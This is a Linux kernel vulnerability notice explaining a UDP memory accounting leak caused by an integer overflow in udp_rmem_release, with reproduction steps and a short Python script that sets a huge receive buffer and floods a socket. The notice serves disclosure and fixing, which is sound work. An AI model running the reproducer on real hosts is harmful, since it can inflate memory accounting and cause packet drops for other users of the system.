In the Linux kernel, the following vulnerability has been resolved:

udp: Fix memory accounting leak.

Matt Dowling reported a weird UDP memory usage issue.

Under normal operation, the UDP memory usage reported in /proc/net/sockstat remains close to zero. However, it occasionally spiked to 524,288 pages and never dropped. Moreover, the value doubled when the application was terminated. Finally, it caused intermittent packet drops.

We can reproduce the issue with the script below [0]:

1. /proc/net/sockstat reports 0 pages

   cat /proc/net/sockstat | grep UDP:

   UDP: inuse 1 mem 0

2. Run the script till the report reaches 524,288

   python3 test.py & sleep 5

   cat /proc/net/sockstat | grep UDP:

   UDP: inuse 3 mem 524288 <-- (INTMAX + 1) >> PAGESHIFT

3. Kill the socket and confirm the number never drops

   pkill python3 && sleep 5

   cat /proc/net/sockstat | grep UDP:

   UDP: inuse 1 mem 524288

4. (necessary since v6.0) Trigger protomemorypcpu_drain()

   python3 test.py & sleep 1 && pkill python3

5. The number doubles

   cat /proc/net/sockstat | grep UDP:

   UDP: inuse 1 mem 1048577

The application set INTMAX to SORCVBUF, which triggered an integer overflow in udprmemrelease().

When a socket is close()d, udpdestructcommon() purges its receive queue and sums up skb->truesize in the queue. This total is calculated and stored in a local unsigned integer variable.

The total size is then passed to udprmemrelease() to adjust memory accounting. However, because the function takes a signed integer argument, the total size can wrap around, causing an overflow.

Then, the released amount is calculated as follows:

1) Add size to sk->skforwardalloc. 2) Round down sk->skforwardalloc to the nearest lower multiple of PAGESIZE and assign it to amount. 3) Subtract amount from sk->skforwardalloc. 4) Pass amount >> PAGESHIFT to _skmemreduceallocated().

When the issue occurred, the total in udpdestructcommon() was 2147484480 (INTMAX + 833), which was cast to -2147482816 in udprmem_release().

At 1) sk->skforwardalloc is changed from 3264 to -2147479552, and 2) sets -2147479552 to amount. 3) reverts the wraparound, so we don't see a warning in inetsockdestruct(). However, udpmemoryallocated ends up doubling at 4).

Since commit 3cd3399dd7a8 ("net: implement per-cpu reserves for memory_allocated"), memory usage no longer doubles immediately after a socket is close()d because __skmemreduceallocated() caches the amount in udpmemorypercpufwalloc. However, the next time a UDP socket receives a packet, the subtraction takes effect, causing UDP memory usage to double.

This issue makes further memory allocation fail once the socket's sk->skrmemalloc exceeds net.ipv4.udprmemmin, resulting in packet drops.

To prevent this issue, let's use unsigned int for the calculation and call skforwardalloc_add() only once for the small delta.

Note that firstpacketlength() also potentially has the same problem.

SORCVBUFFORCE = 33 INTMAX = (2 ** 31) - 1

s = socket(AFINET, SOCKDGRAM) s.bind(('', 0)) s.setsockopt(SOLSOCKET, SORCVBUFFORCE, INT_MAX)

c = socket(AFINET, SOCKDGRAM) c.connect(s.getsockname())

data = b'a' * 100

while True: c.send(data)